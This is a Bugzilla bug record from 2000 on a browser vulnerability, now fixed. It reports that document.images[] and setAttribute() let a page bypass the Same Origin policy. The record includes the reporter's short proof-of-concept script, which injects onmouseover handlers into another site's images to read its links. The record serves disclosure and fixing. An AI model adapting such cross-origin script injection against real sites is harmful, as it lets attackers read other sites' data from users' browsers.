Closed
Bug 28958
Opened 25 years ago
Closed 24 years ago
document.images[] and setAttribute() vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M15
People
(Reporter: norrisboyd, Assigned: norrisboyd)
References
()
Details
(Whiteboard: Fix in hand)
Subject: document.images[] and setAttribute() vulnerability Date: Wed, 23 Feb 2000 15:29:36 +0200 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> There is a security vulnerability in document.images[] and setAttribute() method which allows circumventing the Same Origin security policy. The code is: ----------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com","victim"); function f() { for(i=0;i<a.document.images.length;i++) a.document.images[i].setAttribute("onmouseover","alert('The first link is: '+document.links[0].href)"); } setTimeout("f()",5000); </SCRIPT> -----------------------------------------------
Assignee | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15
Assignee | ||
Updated•24 years ago
|
Whiteboard: Fix in hand
Assignee | ||
Comment 1•24 years ago
|
||
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
You need to log in
before you can comment on or make changes to this bug.
Description
•